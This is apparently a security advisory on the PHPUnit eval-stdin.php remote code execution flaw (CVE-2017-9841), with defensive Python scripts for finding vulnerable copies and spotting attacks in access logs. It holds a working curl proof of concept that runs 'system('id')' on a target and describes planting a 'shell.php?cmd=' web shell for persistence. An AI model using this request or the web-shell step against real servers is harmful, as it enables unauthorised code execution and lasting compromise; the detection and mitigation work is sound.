

Security Report — PHPUnit eval-stdin.php exploit

Summary

Proof of concept. The PHP source is sent as the raw POST body; the vulnerable script does not care about the Content-Type header, so the form-encoded header is harmless but not required:

curl -X POST https://victim.com/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "<?php system('id'); ?>"

Quick mitigation. A Dockerfile step that removes the script from the built image; the real fix is to upgrade PHPUnit and, better still, to stop shipping dev dependencies (composer install --no-dev) into a web-accessible directory at all:

RUN rm -f vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php

Exploit: The attacker sends arbitrary PHP source in the body of an HTTP POST to eval-stdin.php, and the script hands that body to eval(), so the PHP interpreter executes it with the privileges of the web server process. eval-stdin.php is a helper that PHPUnit uses when it runs test code in a separate PHP process. Vulnerable releases (before 4.8.28 and 5.x before 5.6.3, tracked as CVE-2017-9841) read that code from php://input, which is the raw HTTP request body, so any copy of the file reachable under the document root is an unauthenticated remote code execution endpoint. Patched releases read from php://stdin instead, which an HTTP request cannot write to.

Note: The script evaluates the string '?' . '>' followed by the input. The concatenation is simply ?> written so that the literal does not terminate the PHP block in the source file itself. Inside eval() it closes the PHP mode that eval() starts in, so the request body is parsed like a complete PHP file: it must carry its own <?php opening tag, which is why the payload above begins with one.
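The following is an added example, not code from the original report or from the PHPUnit project: a small Python check that walks a deployment, finds every copy of eval-stdin.php and classifies it from the one line that matters, eval() of php://input (vulnerable) versus php://stdin (patched). The two sample file contents and the temporary vendor tree are constructed here so the check runs offline; the regular expression for the eval() call is this example's own assumption about how the line is written, not something the page specifies.

```python
"""Added example (not from the original report): locate copies of PHPUnit's
eval-stdin.php under a deployment and classify each as vulnerable or patched.

Vulnerable releases evaluate php://input (the HTTP request body); patched
releases evaluate php://stdin. The sample files below are constructed here
to exercise the check offline.
"""
import os
import re
import tempfile

# Relative path of the script inside a Composer vendor tree.
EVAL_STDIN_REL = os.path.join("phpunit", "phpunit", "src", "Util", "PHP", "eval-stdin.php")

# Assumed shape of the eval() line: capture the stream handed to file_get_contents().
EVAL_CALL = re.compile(
    r"eval\s*\(.*file_get_contents\s*\(\s*['\"](php://[a-z]+)['\"]", re.S
)


def classify_eval_stdin(source: str) -> str:
    """Return 'vulnerable', 'patched' or 'unknown' for the contents of eval-stdin.php."""
    m = EVAL_CALL.search(source)
    if m is None:
        return "unknown"        # not the shape we expect; inspect by hand
    stream = m.group(1)
    if stream == "php://input":
        return "vulnerable"     # request body is eval()'d: CVE-2017-9841
    if stream == "php://stdin":
        return "patched"        # only the parent PHPUnit process can feed it
    return "unknown"


def find_eval_stdin(root: str) -> list:
    """Walk a directory tree and return (path, classification) for every eval-stdin.php."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        if "eval-stdin.php" in files:
            path = os.path.join(dirpath, "eval-stdin.php")
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits.append((path, classify_eval_stdin(fh.read())))
    return sorted(hits)


# Constructed sample sources mirroring the two shapes of the script.
VULNERABLE_SRC = "<?php\neval('?' . '>' . file_get_contents('php://input'));\n"
PATCHED_SRC = "<?php\neval('?>' . \\file_get_contents('php://stdin'));\n"


def build_sample_tree() -> str:
    """Create a throwaway vendor tree with one vulnerable and one patched copy."""
    root = tempfile.mkdtemp(prefix="phpunit-check-")
    for sub, src in (("app1/vendor", VULNERABLE_SRC), ("app2/vendor", PATCHED_SRC)):
        path = os.path.join(root, sub, EVAL_STDIN_REL)
        os.makedirs(os.path.dirname(path))
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(src)
    return root


if __name__ == "__main__":
    # Point find_eval_stdin() at a real web root instead of the sample tree.
    for path, verdict in find_eval_stdin(build_sample_tree()):
        print(f"{verdict:10s} {path}")
```

A "patched" verdict only means the script no longer reads the request body; a copy of PHPUnit under the document root is still a dev dependency that should not be served, so treat every hit as something to remove, not just the vulnerable ones.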

Attack Vectors

Persistence: a single successful request is enough to outlive the removal of the script. The attacker POSTs PHP that writes a web shell (shell.php, which runs the command passed in its cmd parameter) into a web-accessible directory. Now, the attacker can simply visit https://target.com/shell.php?cmd=whoami and maintain access indefinitely, even after the original eval-stdin.php is removed. Deleting eval-stdin.php is therefore not sufficient on a host that was exposed: look for newly created or modified .php files under the document root, and for POST requests to the script in the web server access logs.
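As an added example (not part of the original report), the detection side of the chain just described: a few Python rules run over constructed Combined Log Format access-log lines. They flag any request for a path ending in /eval-stdin.php (a POST as an exploitation attempt, anything else as a probe), flag requests for .php files with a cmd= query string, and tie the two together per source IP. The log lines, IP addresses and the shell.php name are constructed for this example; the cmd parameter follows the report's own shell.php?cmd=whoami.

```python
"""Added example (not from the original report): access-log detection for the
eval-stdin.php attack chain. Log lines are constructed; the format is the
Combined Log Format that Apache and Nginx emit by default.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Combined Log Format: ip - user [time] "METHOD target HTTP/x" status size "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2023:10:01:02 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2023:10:01:09 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 200 38 "-" "curl/7.88.1"
203.0.113.7 - - [12/Mar/2023:10:01:15 +0000] "GET /shell.php?cmd=whoami HTTP/1.1" 200 12 "-" "curl/7.88.1"
198.51.100.4 - - [12/Mar/2023:10:02:00 +0000] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 196 "-" "python-requests/2.28"
192.0.2.9 - - [12/Mar/2023:10:03:30 +0000] "GET /about.php?page=team HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Parse one access-log line into a dict, or None if it is not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def classify(rec):
    """Return a list of alert tags for one parsed record (empty if nothing matched)."""
    tags = []
    if rec["path"].lower().endswith("/eval-stdin.php"):
        # A 404 still matters: someone is scanning for the script.
        tags.append("eval-stdin-rce-attempt" if rec["method"] == "POST" else "eval-stdin-probe")
    if rec["path"].lower().endswith(".php") and "cmd" in rec["query"]:
        tags.append("webshell-command")
    return tags


def scan_log(text):
    """Run the rules over every line; return (ip, method, path, tags, status) for each hit."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        tags = classify(rec)
        if tags:
            hits.append((rec["ip"], rec["method"], rec["path"], tuple(tags), rec["status"]))
    return hits


def attacker_ips(text):
    """IPs that POSTed to eval-stdin.php and then used a ?cmd= web shell: the chain above."""
    seen_rce, chained = set(), set()
    for ip, _method, _path, tags, _status in scan_log(text):
        if "eval-stdin-rce-attempt" in tags:
            seen_rce.add(ip)
        elif "webshell-command" in tags and ip in seen_rce:
            chained.add(ip)
    return sorted(chained)


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
    print("chained:", attacker_ips(SAMPLE_LOG))
```

The webshell rule is deliberately narrow (a cmd parameter on a .php path); a real shell can use any parameter name, so pair it with the file-integrity check on the document root mentioned above rather than relying on the log rule alone.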
